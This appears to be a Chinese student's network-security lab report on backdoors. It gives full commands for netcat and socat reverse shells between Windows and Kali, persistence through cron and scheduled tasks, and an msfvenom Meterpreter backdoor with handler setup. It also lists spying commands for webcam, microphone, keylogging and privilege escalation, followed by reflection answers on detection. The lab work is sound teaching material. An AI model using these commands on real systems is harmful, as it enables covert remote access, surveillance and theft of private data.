Exp2后门原理与实践

时间:2021-10-18 18:50:21

一、简单后门

1、ncat、socat的基础操作

工具介绍:

netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
socat:类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++

Meterpreter:利用 Metaspolit 的 msfvenom 指令生成后门可执行文件。

操作内容:

1.1Windows与linux间获取Shell

1.1.1 Windows主机获取 Linux Shell
windows:

1、win主机查本机IP地址:ipconfig

Exp2后门原理与实践

由上图可见IPV4的地址为192.168.43.102

2、利用netcat.exe程序监听端口:4330

Exp2后门原理与实践

ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\Mypc\Desktop\网络攻防实验二图片\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4330监听端口4330

kali:

1、使用nc 192.168.43.102 4330 -e /bin/sh指令反向连接Windows主机的4330端口:

Exp2后门原理与实践

2、windows执行linux shell的指令

Exp2后门原理与实践

此时,可以在cmd.exe下运行linux的指令

1.1.2Linux主机获取 Windows shell

linux:

1、查看kali的主机IP地址:ifconfig

Exp2后门原理与实践

上图可以看到kali的主机IP地址为192.168.29.129

2、输入nc -l -p 4330指令监听端口

Exp2后门原理与实践

windows:

1、在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305命令去连接Linux的4305端口。

2、Linux运行Windows shell

1.2Linux运行Windows shell

1.Windows输入指令ncat.exe -l 4330 监听

2.Linux输入指令nc 192.168.43.102 4305 连接win主机

3.双向传输字符串
Exp2后门原理与实践

1.3 ncat定时启动

1、Windows输入指令ncat.exe -l -p 4330监听
Exp2后门原理与实践

2、Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:10 * * * * /bin/netcat 192.168.43.102 4330 -e /bin/sh
在每小时的10分运行ncat回连win主机
Exp2后门原理与实践

3、时间一到就可以运行linux shell指令

1.4 socat 定时启动

1、在windows下依次打开控制面板-管理工具-任务计划,新建一个任务

Exp2后门原理与实践
Exp2后门原理与实践

2、新建触发器
Exp2后门原理与实践

3、新建操作

Exp2后门原理与实践

其中添加参数为:tcp-listen:4330 exec:cmd.exe,pty,stderr

4、运行任务

Exp2后门原理与实践

5、Linux输入指令 socat - tcp:192.168.43.102:4330
, windows主机IP、端口号,此时可以获取win的shell命令

Exp2后门原理与实践

二、体验 MSF Meterpreter 功能

2.1利用msfvenom指令生成后门程序

1、在Linux主机输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.129 LPORT=4330 -f exe > 20154305_backdoor.exe

此条指令意为生成一个.exe程序,名称为 20154330_backdoor,将来在windows上运行时会回连到Linux主机相应端口

Exp2后门原理与实践

2、将生成文件拷贝到windows下(随意目录)

Exp2后门原理与实践

2.2进入控制台设置相关参数

1、linux输入指令msfconsole
Exp2后门原理与实践

2.在msf>下输入命令use exploit/multi/handler

3.输入set payload windows/meterpreter/reverse_tcp
设置payload

4.输入指令set LHOST 192.168.29.129

5.输入指令set LPORT 4330

6.输入指令show options
Exp2后门原理与实践

2.3开始监听

1、Linux输入指令exploit
开始监听
Exp2后门原理与实践

2.windows主机双击后门木马程序执行

3.1输入指令record_mic录制一段音频

3.2输入指令webcam_snap拍摄照片

3.3输入指令screenshot截取屏幕

3.4输入指令keyscan_start记录击键内容,输入指令keyscan_dump获取击键记录

3.5输入指令getuid查看当前用户,输入指令getsystem提权

Exp2后门原理与实践
Exp2后门原理与实践
Exp2后门原理与实践

三、问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

从网络上下载非正版的软件安装包、压缩包
各种不明来历的信息,链接,还有一些小视频……
移动设备拷贝文件时携带

2.例举你知道的后门如何启动起来(win及linux)的方式?

后门程序与文件或程序绑定,打开文件或程序时,后门启动。
电脑开机时后门程序自动启动。

3.Meterpreter有哪些给你映像深刻的功能?

感觉它超级强大……每个功能都很让我印象深刻!开摄像头,屏幕截图,录音频……完全没有任何隐私,所以以后在软件的安装中要做到尽可能从正规渠道下载,对于一些不明来历的信息,链接不因好奇心而点击,减少系统被植入后门的危险。

4.如何发现自己有系统有没有被安装后门?

如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。
使用杀毒软件,定时经常性的进行全盘查杀
下载文件进程的时候,设置防火墙

四、实验感想

本次实践主要是多种方法linux获取win的shell,winxp获取linux的shell。后门的简单学习,生成一个后门文件,安装在靶机中,控制靶机,就可以得到自己想要得到的信息。Meterpreter,功能很强大,通过实践,也意识到后门程序一旦被启动,那信息被盗取很容易。所以计算机没有绝对的安全,在使用时要避免打开一些不良的或者未知的文件。